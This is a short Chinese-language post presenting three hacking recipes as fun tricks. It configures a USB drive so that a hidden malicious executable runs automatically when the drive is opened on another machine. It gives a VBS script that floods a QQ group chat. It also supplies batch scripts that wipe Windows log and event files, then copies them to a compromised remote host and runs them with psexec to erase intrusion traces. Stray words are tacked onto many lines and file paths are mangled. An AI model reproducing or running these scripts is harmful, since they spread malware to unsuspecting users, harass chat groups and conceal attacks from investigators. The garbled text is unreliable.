惡意文件小樂趣

一、將可執行惡意文件放入U盤。並設置隱藏。
shell

二、建立文件 Autorun.infide

三、寫入內容:
測試

[AutoRun]
OPEN=惡意文件全名
shellexecute=惡意文件全名
shell\Atuo\command=惡意文件全名

隱藏本文件。spa

四、當U盤插入新的設備,操做人員雙擊U盤圖標查看U盤時,會自動運行惡意文件。日誌


VBS腳本,QQ羣聊刷屏:ip

新建vbs後綴文件。內容以下:it

Set WshShell= WScript.CreateObject("WScript.Shell")
WshShell.AppActivate "羣聊刷屏測試"
for i=1 to 10 
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next

#for i=1to 10」語句用來控制發送次數,表示發送10次class


打開一個羣聊天窗口並複製要發送的內容到剪貼板上,雙擊剛纔生成的「qq.vbs」切換到羣聊天窗口中,在其中可看到已自動刷屏了。file


日誌清除:command


新建del.bat腳本

@del c:winntsystem32logfiles*.* 
@del c:winntsystem32config*.evt 
@del c:winntsystem32dtclog*.* 
@del c:winntsystem32*.log 
@del c:winntsystem32*.txt 
@del c:winnt*.txt 
@del c:winnt*.log 
@del c:del.bat

新建clean.bat


@copy del.bat 
\%1c$ 
@echo 
向肉雞複製本機的del.bat
……OK 
@psexec 
\%1 c:del.bat 
@echo 
在肉雞上運行del.bat
,清除日誌文件……OK
相關文章
相關標籤/搜索